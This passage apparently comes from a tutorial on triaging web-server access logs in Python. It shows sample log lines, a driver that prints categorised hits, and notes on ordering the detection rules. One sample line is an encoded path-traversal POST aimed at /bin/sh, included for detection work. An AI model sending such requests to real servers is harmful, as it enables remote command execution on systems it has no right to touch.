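203.0.113.18 - - [09/Jan/2025:03:14:07 +0000] "\x16\x03\x01\x00\xCA\x01\x00\x00\xC6\x03\x03" 400 166 "-" "-" "-"
203.0.113.19 - - [09/Jan/2025:07:10:45 +0000] "\x05\x01\x00" 400 166 "-" "-" "-"
203.0.113.20 - - [11/Jan/2025:03:10:26 +0000] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 166 "-" "-" "-"
203.0.113.21 - - [09/Jan/2025:12:00:00 +0000] "GET /index.html HTTP/1.1" 200 3107 "-" "Mozilla/5.0" "-"
'''.strip().splitlines()

if __name__ == '__main__':
    hits, counts = triage(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ip']:<14} {h['status']} {h['category']:<34} {h['target']}")
    print(dict(counts))
```

Run it against a real file with `triage(open('access.log').readlines())`; the decoded `target` field is the one to read, because the raw line for the traversal entry never contains a literal `..`. The rules are deliberately ordered from most specific (command strings, traversal) to least specific (login pages), so a request that carries a download command under a WordPress path is still counted as malware delivery.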